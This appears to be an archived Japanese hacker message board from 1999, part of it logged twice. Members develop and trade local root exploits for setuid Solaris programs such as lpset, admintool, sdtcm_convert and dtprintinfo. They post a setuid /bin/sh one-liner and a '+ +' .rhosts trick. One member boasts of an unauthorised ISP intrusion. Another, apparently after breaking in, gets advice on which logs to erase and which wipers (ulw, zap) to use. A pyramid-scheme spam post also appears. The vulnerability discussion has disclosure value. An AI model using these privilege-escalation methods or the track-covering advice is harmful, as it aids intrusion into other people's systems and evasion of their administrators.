| 【名 前】mk-2 【タイトル】mk-2と申します!! 05/10 23:48 |
mk-2@iname.comhttp://www.geocities.co.jp/Broadway/9105/index.html |
| 【メッセージ】 UNYUN様 >mk-2さん それは、ウチのことじゃないでしょうか...? その通りです、どこをどう間違えたのか、 ミスってDEF CON ZERO さんの所にカキコしちゃいました・・。 五右衛門ですが、Toolの所に無い様なので、配布終了!! っ事なのでしょうか?? できれば頂きたいですぅ。 是非、宜しくお願い致します。 |
| 【名 前】UNYUN 【タイトル】わふー 05/10 23:11 |
unewn4th@usa.net |
| 【メッセージ】 @Dylan!!さん あぁ、とうとうターボ君入れたんですね。 本はLINUX関連のを何か買った方がいいです。 ネット ワークカードは、ISAならI/OとかIRQとかをちゃんと調整しましょう。 ダメならあきらめて買ったほうが早いです。安~ いですし(笑) >この場合ログとかはどんなところに残るんですか? >もしログ消す場合はulwなどを使うだ~ けで大丈夫でしょうか? も、もしや、フィールドテストしたんですか?(笑) とりあえずulwで消してみてくださ~ い。 (ダメならzapでも使って下さい) 一応、/var/adm/messagesと/var/log/syslogあたり、あと /etc/syslog .confで指定されてるものが基本ですけど... それ以外でも、取ろうと思えばいくらでも取れるし、他の ホストでパ ケット見てるかもしれませんし、どれを消せば オッケーっていうのは言えないです。 @Rorrimさん あぁ、 MkLinux、それいい(笑) あ、そうか。家にPower PC 8100とかがあるんですけど、 そーいえばこーいう手もあった (喜) どうせ使ってないし、入れちまおう。 @板前さん あはは... 投稿しちまいました。 一気に投~ 稿するのも、なんかイケナイような雰囲気なんで... ポツポツと... >Get free e-mail and a permanent addr ess at http://www.netaddress.com/?N=1 うーん、たしかにいかんですね(笑) usa netって、勝手についてくるん ですよね。 プロ場も相変わらず入ってないですし... そうだ、くるさん、backsection.comのメアカくれるって 言ってたのにぃ。いつくれるのサー! くれくれー!!君。 |
| 【名 前】板前 【タイトル】そうそう、 05/10 21:16 |
itamae@iname.comhttp://cgi.itam
ae.server.ne.jp/ |
| 【メッセージ】 to うにゅんさん 知り合いがメールの最後の Get free e-mail and a permanent address at http://www.netaddres s.com/?N=1 これだけはイケナイぜと言っておりました(笑)。 |
| 【名 前】板前 【タイトル】見ました 05/10 21:08 |
itamae@iname.comhttp://cgi.itam
ae.server.ne.jp/ |
| 【メッセージ】 ども、こにちわ。 bugtraq見てたらどこかで見た名前が...。と思ったらうにゅんさん でしたのね(笑)。 追 伸 私、Macでやっております(笑)。この書きこみはwinからですが...。 |
| 【名 前】Rorrim 【タイトル】MaC-hacker 05/10 19:58 |
49hack@usa.net |
| 【メッセージ】 私はマックは、iMaCからなんで偉そうな事言えませんが... (はっきり言って89するならMacよりWinsかUnixが全然~ いいです。) とりあえずNASCA-TelnetとかCodeWorrierが要ると思います。 前者はTelnet-Clientで後者はコン パイラです。 っていうかMkLinuxにしましょう!(笑) |
| 【名 前】Dylan!! 【タイトル】rootになれたみたいです 05/10 19:47 |
|
| 【メッセージ】 TurboLinuxインストールしました。いやー、いざさわろうとしても最初に何を していいのかわからないです。やっぱり 本を1冊買った方がいいですね。 しかしなぜフォルダーのアイコンが表示されないのだろう(謎)。 ネットワーク カードも認識されないみたいだしLANでつなげれないです、、、 2000円ぐらいのNE2000互換のやつなんですけどや~ っぱ買い換えないとだめでしょうか? 自分はSparcのSoralis2.6日本語版でやってみましたが 文字がダラーと出 てきて何も現れなくなったからCtrl + Cを押してみたら #が出てきてシャドウとか見れたんでたぶんRootになれたみた いです。 この場合ログとかはどんなところに残るんですか?もしログ消す場合はulwなどを使うだけで大丈夫でしょう~ か? マック用の色々なツールは悪のマニュアル2に色々とCD-ROMで付いていたみたいですけど。 あとソフトの 付録は付いてないですけど、最近読んで面白かったのはハッカーズバイブルですね(立ち読みですが)。 この本はマッ クの話題だけなんですけどレスエディットや色々な裏話が載ってて よかったです。でも侵入とかそういう意味でのハッ キングは載ってなかったようなので 夜叉さんが知りたいこととはちょっと違うかも知れませんが、マックユーザーなら 見てみると 面白いと思います。自分もハッカーズバイブル読んでマックがほしくなりましたから。 |
| 【名 前】UNYUN 【タイトル】lpset 05/10 11:00 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【メッセージ】 lpsetのセキュリティホールですが、 -n xnf オプションを付ければ、sysadminグループじゃなくてもrootに なることができるようです。 ということで、変更しました。 http://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【名 前】UNYUN 【タイトル】admintool 05/10 09:01 |
unewn4th@usa.net |
| 【メッセージ】 admintoolって、sysadminグループのユーザならソフトウエア の追加ができるみたいですね。 しかも、 main() {setuid(0); setgid(0); system("/bin/sh"); } なプログラムをpkginfoにインストールパーミッション4755 で指定すると... これがちゃんとインストールするみたい。 あと、+ + な /.rhostsとかも... sysadminグループのユーザ=rootなんですね。 これは仕様か?(笑) ちゅか、これが仕様ならsysadminグループの意味はあまり無い し、それこそadmintoolをsuidにする意味はないですね。 pkgaddならインストールできないけど... この違いは何なんだ ろう... |
| 【名 前】UNYUN 【タイトル】レレレ 05/09 19:12 |
unewn4th@usa.net |
| 【メッセージ】 @Rorrimさん あーあ。 見つかったら、お縄ですね(笑) 法律的にどーのこーのなると、NTTログも出せるらしいですし。 まぁ、相手がISPだから、そんなに大事にはならんと思いますけど、 なんとも言えんですね。 海外逃亡したら、お手紙ください(笑) @キノコびとさん どのexploitで、どういう現象になるのか、教えていただけませんか? ....って、 このアヤシイHN一体...(笑) @夜叉さん >はじめまして、僕は、ハッカーになりたいんですがMac用の >ツールとかあったら教えて下さいお願いします ....。 えーと、ハッカーですか。 私は単なる技術屋だし、マックのことは良く知らんですけど、 ツールってことなら、 Cコンパイラ、アセンブラ、デバッガ があれば、基本的にコト足りるんじゃないでしょうか。 あとは、本人の問題だと思いますけど。 クラッカーになりたいんなら、それなりのツールは山ほどあるんです けどね。私はそーいうのは、ウトいんで良く知りません(笑) |
| 【名 前】夜叉 【タイトル】教えて下さい 05/09 14:49 |
cat11870@pop21.odn.ne.jp |
| 【メッセージ】 はじめまして、僕は、ハッカーになりたいんですがMac用のツールとかあったら教えて下さいお願いします |
| 【名 前】キノコびと 【タイトル】re:(1)嘆願 05/09 12:13 |
|
| 【メッセージ】 おお、久しぶりに見た(笑)>特殊情報 ってかただのリンク集かな。 それはいいとして、2.6用のexploit、日本語版(?)ソラリス2.6だとだめみたい。 |
| 【名 前】Rorrim 【タイトル】殺られた〜 05/09 05:08 |
|
| 【メッセージ】 某ISPに侵入成功するも足跡消せず。 ど〜しよう〜、USER=sync(UID=0、GID=1)にPassが設定してなかったんで バリバリSUしまくったよ〜。 Lastログが〜、Messagesが〜... せめてもの救いはHack-Accountだった事だけ... 踏み台なし(TT) サバ管理者さ〜ん、脅迫なんてしてないでしょ〜 ただ覗いただけなんでしゅ〜、許して〜。 どうしましょ。(マジでヤバイ) |
| 【名 前】UNYUN 【タイトル】re:(1)嘆願 05/09 02:37 |
unewn4th@usa.net |
| 【メッセージ】 はじめまして。 >突然ですが、仲間に加えていただけませんか? 失礼ですが、この2行ではmini-Fさんのことは良く分からないので、分かるように 書いてください。 |
| 【名 前】mini-F 【タイトル】嘆願 05/09 00:06 |
t_kun@mail.goo.ne.jphttp://pipi.net/pj1 |
| 【メッセージ】 突然ですが、仲間に加えていただけませんか? あと相互リンクお願いします。 |
| 【名 前】TrainCrash 【タイトル】re:(2)あの...(アカデミーについて) 05/08 19:37 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 亀レスですいません。 かなり”期待”してるんで(笑) 頑張ってください。 |
| 【名 前】UNYUN 【タイトル】ADJUST 05/08 08:10 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【メッセージ】 ADJUSTの件、解決です。 日本語表示によるスタックのズレによるADJUST調整ですけど、 LANG環境変数をクリアして、英語版に統一しとけば問題 なかったですね。 アップしなおしときます。 |
| 【名 前】UNYUN 【タイトル】admintoolも。 05/08 02:35 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_admintool.c |
| 【メッセージ】 また、見っけました。 admintoolも、ダメダメです。 これこそsuidにする意味ナシなのに、オーバーフロー します。 Solaris2.5時代も、一般ユーザーが + + な.rhostsを作成 できたりするバグもあったようですが、、、 admintoolは諸悪の根元ですな。 このオーバーフローは、admintoolのソフトウエアの追加機能 で出ます。 普通は、あれでパッケージとかを指定してインストールする んですけど、パッケージ情報ファイルpkginfoの読み込み 処理に問題があるようで、PKG=やNAME=などに長い文字列 を指定してたpkginfoを作成してadmintoolに読み込ませると オーバーフローします。 テキスト処理なんで、0x0a回避やら、バッファ調整やらに ちょい手こずりましたが、攻撃プログラムができました。 Sparc版です。そのうち、Inten版も作るかもしれませんが... http://www.fortunecity.com/skyscraper/byte/551/tools/ex_admintool.c SunOS 5.6 Generic sun4u sparc SUNW,Ultra-30 SunOS 5.6 Generic sun4m sparc sun4m SunOS 5.6 Generic sun4m sparc SUNW,SPARCstation-20 の3台で確認しました。 IntelのSolaris7も同じバグがあるので、たぶんSolaris7にも 使えます。 #define ADJUST1 #define ADJUST2 の値は、あいかわらず環境によって違うかもしれません。 0〜3で適当に試してみてください。 英語版Solaris2.6だと、 ADJUST1 = 2 ADJUST2 = 1 でしたが、日本語環境だと、 ADJUST1 = 1 ADJUST2 = 2 でした。 |
| 【名 前】UNYUN 【タイトル】re:(1)一連のbuffer overflowに関して 05/07 13:53 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【メッセージ】 >しかし,こういうのが判ってるならSUID BITを全部外せばいいのに.. そうですね。 わざわざsuidにしなくてもなんとかなるだろって思うの、あります よね。バグ出すくらいなら、root限定にしたほうがまだマシ ですし。 |
| 【名 前】tbaba 【タイトル】一連のbuffer overflowに関して 05/07 13:32 |
tbaba@unixuser.orghttp://www.technotronic.com/security-faqs/security-faq.html |
| 【メッセージ】 homepageとしてlinkした先にSUIDを外せる実行ファイルが 記載されていて,その中に全部含まれているようです. しかし,こういうのが判ってるならSUID BITを全部外せばいいのに.. |
| 【名 前】UNYUN 【タイトル】むずい 05/07 05:45 |
unewn4th@usa.net |
| 【メッセージ】 netpr、dtaction、uucp それぞれ、suidなのにオーバーフローしますが、攻撃プログラム作るのはちょっとめんどいです。 netprはcore吐かないし、dtactionとuucpは、バウンドチェックミスを含む関数内で、引数で もってきたポインタが参照するバッファをばんばん書き換えてます。 sdtcm_convertは、うまく内部処理をダマせたんですけどねー、これらはなかなか騙せないです。 うーん、コマッタ... サクっとダマされんかい! |
| 【名 前】UNYUN 【タイトル】ちゅか、 05/06 22:50 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【メッセージ】 lpset もですね。Solaris7って一体... コレは、一応先頭でパーミッションチェックやってるので、 ちょっとマシですけどね。 でも、結局sysadm(14)グループのユーザなら、危険なんですよね。 ちゅことで、また攻撃プログラム作ってみました。 Solaris7 for Intel Editionでrootになれました。 http://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c #define ADJUST 2 となってますけど、あいかわらず環境によって違うかもしれません。 0〜3で適当に試してみてください。 |
| 【名 前】UNYUN 【タイトル】つづき 05/06 20:47 |
unewn4th@usa.net |
| 【メッセージ】 netpr も。 プリンタ関連、かなりアヤシイです。 |
| 【名 前】UNYUN 【タイトル】また出たよ... 05/06 14:23 |
unewn4th@usa.net |
| 【メッセージ】 dtaction コレ、Solaris2.6の時に問題が発覚して、Solaris7ではバグ フィックスされてるってことになってるようですが... たしかに、第1引数や、-contextDir、-execHost、-termOpts 指定ではオーバーフローしないですけど、Solaris7 for Intel で実験してみると、-user指定でのユーザ名でオーバーフロー するようです。 |
| 【名 前】UNYUN 【タイトル】re:(1)あの...(アカデミーについて) 05/06 06:12 |
unewn4th@usa.net |
| 【メッセージ】 >特に公開終了説明が見当たらないので、一応質問してみました。 あ、あれはこれから公開予定なんです。 |
| 【名 前】TrainCrash 【タイトル】あの...(アカデミーについて) 05/05 23:44 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 すいません、アカデミーのなかにあるファイルを 見たいのですが、二つ以外の公開、(UnixとC言語)は していらっしゃらないのでしょうか? 特に公開終了説明が見当たらないので、一応質問してみました。 返答よろしくお願い致します。 では。 |
| 【名 前】UNYUN 【タイトル】更新 05/05 20:37 |
unewn4th@usa.net |
| 【メッセージ】 「UNIX基礎講座」をPenguin Academyにアップしました。 Hariruさんが担当してくれてます。 一応、今後の講座予定もAcademyに掲載しました。 しかし、Hariruさん、途中までってって言っても 結構たくさん書いてくれてるじゃないですか〜 続きも、よろしくお願いします。 |
| 【名 前】UNYUN 【タイトル】re:(3)そんなcore知りません! 05/05 20:19 |
unewn4th@usa.net |
| 【メッセージ】 >えーと、誤解のないように訂正しておきますと、送ったのはcoreじゃなくて いや...(汗) ま、まさかreverseさんに限って、coreが、どーっと来るってことは ないだろなとは思ってたんですよ、ホ、ホントに(汗) 届いたら、それはそれでイケてるシャレですが(笑) いろいろ協力ありがとござりました。 どうも、イロイロやってて、ADJUSTは0か3でイケそうですね。 っていうか、ホントは3の方がアヤシイんです。ヘンにズレるんで わざわざ3byteの調整してるんです。 私も、英語版Solaris7でやろーと思ったら... 日本語版が手に入った ので人にあげちゃったようで... 必要になるとは思わなかったです。 |
| 【名 前】reverse 【タイトル】re:(2)そんなcore知りません! 05/05 18:57 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 えーと、誤解のないように訂正しておきますと、送ったのはcoreじゃなくて gdb --core core の出力のやつです。冗談で送ろうかと思いましたが(笑)。 で、rootになれました。 英語版だとretアドレスの場所がずれるんですかぁ。 sparc版もやろうかと思って、NVRAMを手打ち(笑)して起動したんですが、 gccすら入れてないんでやめました。ごみだな、このSS2。 |
| 【名 前】UNYUN 【タイトル】re:(1)dtprintinfo Sparc Solaris 2.6 05/05 17:49 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 ># ただ,前述のpatch等あててない環境でですけど... だはは。 それじゃぁと、パッチを入れまくったら、まいワークステーション のSolaris2.6は、お亡くなりになりました(笑) なんでやねん。 今、再構築ちゅ。またやってもーた。うぅーーー(泣) |
| 【名 前】UNYUN 【タイトル】re:(1)そんなcore知りません! 05/05 17:45 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 >で、バイナリの方を実行した時のコアを送りました。 どうもありがとうございます。 お手数かけました。 おかげで、謎が解けました。 コードの埋め込みはばっちりなんですが、retアドレスの埋め込み値 がズレてます。 http://www.fortunecity.com/skyscraper/byte/551/toolbox.html の方の、ex_dtprintinfo86.cなんですが、 #define ADJUST 3 を #define ADJUST 0 に変更すると、たぶん動きます。 (1か2かもしれないですが...) すんません。fortune側のtoolboxからダウンして、も一回やって もらえませんでしょか... |
| 【名 前】tbaba 【タイトル】dtprintinfo Sparc Solaris 2.6 05/05 14:06 |
tbaba@unixuser.orghttp://www.unixuser.org/~tbaba/ |
| 【メッセージ】 Expolitできますね. # ただ,前述のpatch等あててない環境でですけど... |
| 【名 前】UNYUN 【タイトル】re:(1)dtprintinfo 05/05 14:00 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 > の方ですけども,Intel Solarisが今手元にないんですよ(^^; あ、SparcとIntelと両方作ってますので、Sparcでお願いしますです。 http://www.fortunecity.com/skyscraper/byte/551/toolbox.html の下の方にアップしています。 結構、バッファがシビアなんで、環境によってはrootになれません。 でも、suidなのにオーバーフローすることは確実です。 |
| 【名 前】UNYUN 【タイトル】re:(1)sdtcm_convert 05/05 13:57 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 >とりあえず,CIACののBulletins J-028に >関連する記述がありました. なーるほど、SUNはsdtcm_convertに関して警告&patch を出してるようですね。 rootshellやpacket storm、BugTraqとかばっかり探してた(笑) でも、アレな人には、攻撃プログラムは必要かな...(苦笑) |
| 【名 前】tbaba 【タイトル】dtprintinfo 05/05 13:52 |
tbaba@unixuser.orghttp://www.unixuser.org/%7Etbaba/ |
| 【メッセージ】 の方ですけども,Intel Solarisが今手元にないんですよ(^^; # 探してはみますけども. dtprintinfoについては,BUGTRAQでも,未報告みたいです. # こっちのpatchの話は見つかってないです. |
| 【名 前】UNYUN 【タイトル】re:(1)もうけませんか? 05/05 13:35 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 @カヌーさん >いっしょに儲けませんか? >完全に合法でかつ簡単で、なんてうまい話があるんです >まあ、ネズミ講のように200マンなんてわけには行きませんが… >電話代だけでも稼ぎたいですよね? >お金は一切必要ないし >誰かが損するわけではないので僕はすぐに始めてみました >早い者勝ちなので、いちおうみるだけでもそんはないと思います うーん(笑) ネタ的には、オイシイとこ持っくなぁ ってカンジですが(笑)、 すいません。禁止事項につき、削除させてもらいます。 といっても、こういうのは初なので、これは記念に残しておこう(笑) Shadowかかってるpasswd張り付けも残しとけばよかったなー(しみじみ) |
| 【名 前】tbaba 【タイトル】sdtcm_convert 05/05 13:32 |
tbaba@unixuser.orghttp://ciac.llnl.gov/ciac/bulletins/j-028.shtml |
| 【メッセージ】 とりあえず,CIACののBulletins J-028に 関連する記述がありました. |
| 【名 前】UNYUN 【タイトル】re:(1)sdtcm_convert、Solaris2.6 result 05/05 13:27 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 お初です。 いけましたか。x86の方もやってみます。 patch情報があったら、教えて下さい。一応、探してはみたん ですけど... あと、すんませんがdtprintinfoも試してもらえませんでしょうか。 |
| 【名 前】tbaba 【タイトル】sdtcm_convert、Solaris2.6 result 05/05 13:07 |
tbaba@unixuser.orghttp://www.unixuser.org/%7Etbaba/ |
| 【メッセージ】 お初にお邪魔します. Solaris 2.6/Sparc Exploitされました. # ちぅわけで,これからpatch情報探してきます.(^^; # BUGTRAQ進出しましょうよ(^^) |
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
さきほど最新の書き込みが削除されたため、書き込み数の
算出ができません。1ページ全てをロギングしました
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
さきほど最新の書き込みが削除されたため、書き込み数の
算出ができません。1ページ全てをロギングしました
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
| 【名 前】UNYUN 【タイトル】ちゅか、 05/06 22:50 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c |
| 【メッセージ】 lpset もですね。Solaris7って一体... コレは、一応先頭でパーミッションチェックやってるので、 ちょっとマシですけどね。 でも、結局sysadm(14)グループのユーザなら、危険なんですよね。 ちゅことで、また攻撃プログラム作ってみました。 Solaris7 for Intel Editionでrootになれました。 http://www.fortunecity.com/skyscraper/byte/551/tools/ex_lpset86.c #define ADJUST 2 となってますけど、あいかわらず環境によって違うかもしれません。 0〜3で適当に試してみてください。 |
| 【名 前】UNYUN 【タイトル】つづき 05/06 20:47 |
unewn4th@usa.net |
| 【メッセージ】 netpr も。 プリンタ関連、かなりアヤシイです。 |
| 【名 前】UNYUN 【タイトル】また出たよ... 05/06 14:23 |
unewn4th@usa.net |
| 【メッセージ】 dtaction コレ、Solaris2.6の時に問題が発覚して、Solaris7ではバグ フィックスされてるってことになってるようですが... たしかに、第1引数や、-contextDir、-execHost、-termOpts 指定ではオーバーフローしないですけど、Solaris7 for Intel で実験してみると、-user指定でのユーザ名でオーバーフロー するようです。 |
| 【名 前】UNYUN 【タイトル】re:(1)あの...(アカデミーについて) 05/06 06:12 |
unewn4th@usa.net |
| 【メッセージ】 >特に公開終了説明が見当たらないので、一応質問してみました。 あ、あれはこれから公開予定なんです。 |
| 【名 前】TrainCrash 【タイトル】あの...(アカデミーについて) 05/05 23:44 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 すいません、アカデミーのなかにあるファイルを 見たいのですが、二つ以外の公開、(UnixとC言語)は していらっしゃらないのでしょうか? 特に公開終了説明が見当たらないので、一応質問してみました。 返答よろしくお願い致します。 では。 |
| 【名 前】UNYUN 【タイトル】更新 05/05 20:37 |
unewn4th@usa.net |
| 【メッセージ】 「UNIX基礎講座」をPenguin Academyにアップしました。 Hariruさんが担当してくれてます。 一応、今後の講座予定もAcademyに掲載しました。 しかし、Hariruさん、途中までってって言っても 結構たくさん書いてくれてるじゃないですか〜 続きも、よろしくお願いします。 |
| 【名 前】UNYUN 【タイトル】re:(3)そんなcore知りません! 05/05 20:19 |
unewn4th@usa.net |
| 【メッセージ】 >えーと、誤解のないように訂正しておきますと、送ったのはcoreじゃなくて いや...(汗) ま、まさかreverseさんに限って、coreが、どーっと来るってことは ないだろなとは思ってたんですよ、ホ、ホントに(汗) 届いたら、それはそれでイケてるシャレですが(笑) いろいろ協力ありがとござりました。 どうも、イロイロやってて、ADJUSTは0か3でイケそうですね。 っていうか、ホントは3の方がアヤシイんです。ヘンにズレるんで わざわざ3byteの調整してるんです。 私も、英語版Solaris7でやろーと思ったら... 日本語版が手に入った ので人にあげちゃったようで... 必要になるとは思わなかったです。 |
| 【名 前】reverse 【タイトル】re:(2)そんなcore知りません! 05/05 18:57 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 えーと、誤解のないように訂正しておきますと、送ったのはcoreじゃなくて gdb --core core の出力のやつです。冗談で送ろうかと思いましたが(笑)。 で、rootになれました。 英語版だとretアドレスの場所がずれるんですかぁ。 sparc版もやろうかと思って、NVRAMを手打ち(笑)して起動したんですが、 gccすら入れてないんでやめました。ごみだな、このSS2。 |
| 【名 前】UNYUN 【タイトル】re:(1)dtprintinfo Sparc Solaris 2.6 05/05 17:49 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 ># ただ,前述のpatch等あててない環境でですけど... だはは。 それじゃぁと、パッチを入れまくったら、まいワークステーション のSolaris2.6は、お亡くなりになりました(笑) なんでやねん。 今、再構築ちゅ。またやってもーた。うぅーーー(泣) |
| 【名 前】UNYUN 【タイトル】re:(1)そんなcore知りません! 05/05 17:45 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 >で、バイナリの方を実行した時のコアを送りました。 どうもありがとうございます。 お手数かけました。 おかげで、謎が解けました。 コードの埋め込みはばっちりなんですが、retアドレスの埋め込み値 がズレてます。 http://www.fortunecity.com/skyscraper/byte/551/toolbox.html の方の、ex_dtprintinfo86.cなんですが、 #define ADJUST 3 を #define ADJUST 0 に変更すると、たぶん動きます。 (1か2かもしれないですが...) すんません。fortune側のtoolboxからダウンして、も一回やって もらえませんでしょか... |
| 【名 前】tbaba 【タイトル】dtprintinfo Sparc Solaris 2.6 05/05 14:06 |
tbaba@unixuser.orghttp://www.unixuser.org/~tbaba/ |
| 【メッセージ】 Expolitできますね. # ただ,前述のpatch等あててない環境でですけど... |
| 【名 前】UNYUN 【タイトル】re:(1)dtprintinfo 05/05 14:00 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 > の方ですけども,Intel Solarisが今手元にないんですよ(^^; あ、SparcとIntelと両方作ってますので、Sparcでお願いしますです。 http://www.fortunecity.com/skyscraper/byte/551/toolbox.html の下の方にアップしています。 結構、バッファがシビアなんで、環境によってはrootになれません。 でも、suidなのにオーバーフローすることは確実です。 |
| 【名 前】UNYUN 【タイトル】re:(1)sdtcm_convert 05/05 13:57 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 >とりあえず,CIACののBulletins J-028に >関連する記述がありました. なーるほど、SUNはsdtcm_convertに関して警告&patch を出してるようですね。 rootshellやpacket storm、BugTraqとかばっかり探してた(笑) でも、アレな人には、攻撃プログラムは必要かな...(苦笑) |
| 【名 前】tbaba 【タイトル】dtprintinfo 05/05 13:52 |
tbaba@unixuser.orghttp://www.unixuser.org/%7Etbaba/ |
| 【メッセージ】 の方ですけども,Intel Solarisが今手元にないんですよ(^^; # 探してはみますけども. dtprintinfoについては,BUGTRAQでも,未報告みたいです. # こっちのpatchの話は見つかってないです. |
| 【名 前】UNYUN 【タイトル】re:(1)もうけませんか? 05/05 13:35 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 @カヌーさん >いっしょに儲けませんか? >完全に合法でかつ簡単で、なんてうまい話があるんです >まあ、ネズミ講のように200マンなんてわけには行きませんが… >電話代だけでも稼ぎたいですよね? >お金は一切必要ないし >誰かが損するわけではないので僕はすぐに始めてみました >早い者勝ちなので、いちおうみるだけでもそんはないと思います うーん(笑) ネタ的には、オイシイとこ持っくなぁ ってカンジですが(笑)、 すいません。禁止事項につき、削除させてもらいます。 といっても、こういうのは初なので、これは記念に残しておこう(笑) Shadowかかってるpasswd張り付けも残しとけばよかったなー(しみじみ) |
| 【名 前】tbaba 【タイトル】sdtcm_convert 05/05 13:32 |
tbaba@unixuser.orghttp://ciac.llnl.gov/ciac/bulletins/j-028.shtml |
| 【メッセージ】 とりあえず,CIACののBulletins J-028に 関連する記述がありました. |
| 【名 前】UNYUN 【タイトル】re:(1)sdtcm_convert、Solaris2.6 result 05/05 13:27 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 お初です。 いけましたか。x86の方もやってみます。 patch情報があったら、教えて下さい。一応、探してはみたん ですけど... あと、すんませんがdtprintinfoも試してもらえませんでしょうか。 |
| 【名 前】tbaba 【タイトル】sdtcm_convert、Solaris2.6 result 05/05 13:07 |
tbaba@unixuser.orghttp://www.unixuser.org/%7Etbaba/ |
| 【メッセージ】 お初にお邪魔します. Solaris 2.6/Sparc Exploitされました. # ちぅわけで,これからpatch情報探してきます.(^^; # BUGTRAQ進出しましょうよ(^^) |
| 【名 前】カヌー 【タイトル】もうけませんか? 05/05 11:38 |
http://members.tripod.com/toyokiti/koukoku.txt |
| 【メッセージ】 いっしょに儲けませんか? 完全に合法でかつ簡単で、なんてうまい話があるんです まあ、ネズミ講のように200マンなんてわけには行きませんが… 電話代だけでも稼ぎたいですよね? お金は一切必要ないし 誰かが損するわけではないので僕はすぐに始めてみました 早い者勝ちなので、いちおうみるだけでもそんはないと思います http://members.tripod.com/toyokiti/koukoku.txt |
| 【名 前】UNYUN 【タイトル】re:(1)sdtcm_convert 05/05 11:06 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_sdtcm_convert.c |
| 【メッセージ】 sdtcm_convert、Solaris2.5でも同じようなバグがあるようです。 でも、Solaris2.5時代に、/tmp/calorig.adamのリンクで root権限でファイルのパーミッションを変更できるバグが あって、それを2.6以降で直したようで、プログラムが変わって しまってて、どーもSolaris2.5用のexploitが作れない、 ちゅうか、内部でかなりガリガリとローカルいじってて、retアドレス が上書きない... 2.6みたなローカルだましが通用しないっす。 うーん、どうしたもんか... とりあえず、Sparc版です。 http://www.fortunecity.com/skyscraper/byte/551/tools/ex_sdtcm_convert.c Solaris2.6, 7 for Sparc持ってる人いたら、実験してみて ください。 一応、 SunOS 5.6 Generic sun4u sparc SUNW,Ultra-30 SunOS 5.6 Generic sun4m sparc sun4m SunOS 5.6 Generic sun4m sparc SUNW,SPARCstation-20 の3台で確認しました。 たぶん、dtprintinfoのより安定してます。 |
| 【名 前】UNYUN 【タイトル】sdtcm_convert 05/05 10:24 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 コイツ、やっぱrootになれました。 引数でポインタ渡してるんで、ヘンに書き換えると 内部で書き換えやってるみたいで、落ちるみたいです。 わりとしんどかったー。 ちゅことで、これも危ないってことが判明しました。 Solaris2.6、7使ってる人はご用心。 exploitは、アカデミーとまとめてアップします。 |
| 【名 前】UNYUN 【タイトル】BBS過去ログ 05/05 03:23 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 PenguinBBSの過去ログをアップしました。 このBBSの「注意事項」の下にリンクがあります。 でも、前のO2の時にとってたログ、ちょっとした事故(泣)で 消しちゃって... ありません。 11月、12月、1月はHariruさん提供、3月9日から4月分は 今ここに残ってるヤツです。 すんませんが、2月と3月の頭のログ持ってる人がいましたら、 メルしてもらえないでしょうか。 お願いします。 |
| 【名 前】UNYUN 【タイトル】re:(1)そんなcore知りません! 05/05 03:18 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 >で、バイナリの方を実行した時のコアを送りました。 うぅ、すんませんです。 さっき確認に行ったんですが... 添付ファイルがないです(泣) coreをそのまま送ると、サイズが大きすぎてダメかもしれません。 ホント、すんませんがgzかなんかで、もう一回送ってもらえない でしょうか... 一応、色々と検討つけて fortune側にアップしてみました。 >ちゅうか、もしかしてbugtraq進出ですか?! うーん... 新しくx86のSolaris7マシンをもらって、その日のうちに 見つけてrootになれたんで、たぶん他の誰かも見つけてナニ なプログラム作って、ソレももう出回ってるんじゃないでしょか... 最近、そういうのにウトいんで、よく知らないです(笑) |
| 【名 前】reverse 【タイトル】そんなcore知りません! 05/05 02:39 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
